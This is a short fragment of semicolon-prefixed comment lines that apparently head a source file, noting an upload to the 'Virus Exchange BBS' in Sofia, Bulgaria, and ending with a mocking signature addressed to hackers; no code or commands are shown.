; U/l to Virus Exchange BBS - Sofia, Bulgaria
;
; "Have fun all you Hackers. hahaha" -->JAJ<--